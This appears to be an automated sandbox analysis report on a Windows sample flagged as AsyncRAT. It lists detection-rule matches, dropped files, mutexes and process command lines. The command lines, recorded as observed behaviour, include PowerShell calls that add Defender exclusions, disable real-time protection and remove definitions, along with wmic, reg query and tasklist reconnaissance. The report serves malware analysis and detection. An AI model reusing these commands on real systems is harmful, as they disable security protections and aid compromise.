Source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs Vjy8d2EoqK.exe
Source: Vjy8d2EoqK.exe, 00000000.00000003.1694720616.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs Vjy8d2EoqK.exe
Source: Vjy8d2EoqK.exe	Binary or memory string: OriginalFilenameOOBE-Maintenance.exej% vs Vjy8d2EoqK.exe

Source: Vjy8d2EoqK.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

Source: Vjy8d2EoqK.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.S l r .exe.409294.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.3.S l r .exe.569e78.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.3.S l r .exe.569e78.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.0.XClient.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.S l r .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.Vjy8d2EoqK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\S l r .exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: libcrypto-1_1.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
Source: libssl-1_1.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9922997485632183
Source: python311.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9994449334898279
Source: sqlite3.dll.1.dr	Static PE information: Section: UPX1 ZLIB complexity 0.99775382299659

Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, GHDOQSOKt60AmXixKaY.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, GHDOQSOKt60AmXixKaY.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JrCZwsIvjVF3h1G2N1o.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JrCZwsIvjVF3h1G2N1o.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 8MkYr80s4fTZIpKxrpgZ9Q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, NlOekkeE5O7s901dhU6uz3.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, NlOekkeE5O7s901dhU6uz3.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 8MkYr80s4fTZIpKxrpgZ9Q.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, NlOekkeE5O7s901dhU6uz3.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, NlOekkeE5O7s901dhU6uz3.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, GHDOQSOKt60AmXixKaY.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, GHDOQSOKt60AmXixKaY.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, csnL8AtkWHZty2lLwdG.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, csnL8AtkWHZty2lLwdG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, csnL8AtkWHZty2lLwdG.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, csnL8AtkWHZty2lLwdG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.evad.winEXE@124/73@7/5

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 1_2_00007FF76D5C29E0 GetLastError,FormatMessageW,MessageBoxW,

1_2_00007FF76D5C29E0

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe

Code function: 2_2_002A9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

2_2_002A9E1C

Source: C:\Brokercrt\comReviewsession.exe

File created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

File created: C:\Users\user\AppData\Roaming\XClient.exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Mutant created: \Sessions\1\BaseNamedObjects\b
Source: C:\Brokercrt\comReviewsession.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\188035234b6efcd4125799b36dad9dd497004c0f
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\9oIQHybA1LjAiymG
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03

Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe

File created: C:\Users\user\AppData\Local\Temp\Built.exe

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Command line argument: sfxname	2_2_002AD5D4
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Command line argument: sfxstime	2_2_002AD5D4
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Command line argument: STARTDLG	2_2_002AD5D4
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Command line argument: xj.	2_2_002AD5D4

Source: Vjy8d2EoqK.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Brokercrt\comReviewsession.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Built.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Built.exe, Built.exe, 00000003.00000002.2065249418.00007FFDF7591000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: Vjy8d2EoqK.exe	ReversingLabs: Detection: 92%
Source: Vjy8d2EoqK.exe	Virustotal: Detection: 84%

Source: Built.exe	String found in binary or memory: id-cmc-addExtensions
Source: Built.exe	String found in binary or memory: set-addPolicy
Source: Built.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: Built.exe	String found in binary or memory: --help
Source: Built.exe	String found in binary or memory: --help
Source: Built.exe	String found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
Source: Built.exe	String found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :

Source: unknown	Process created: C:\Users\user\Desktop\Vjy8d2EoqK.exe "C:\Users\user\Desktop\Vjy8d2EoqK.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Process created: C:\Users\user\AppData\Local\Temp\svchosts.exe "C:\Users\user\AppData\Local\Temp\svchosts.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Process created: C:\Users\user\AppData\Local\Temp\S l r .exe "C:\Users\user\AppData\Local\Temp\S l r .exe"
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe"
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: unknown	Process created: C:\Windows\SysWOW64\it-IT\dasHost.exe C:\Windows\SysWOW64\it-IT\dasHost.exe
Source: unknown	Process created: C:\Windows\SysWOW64\it-IT\dasHost.exe C:\Windows\SysWOW64\it-IT\dasHost.exe
Source: unknown	Process created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
Source: unknown	Process created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
Source: unknown	Process created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
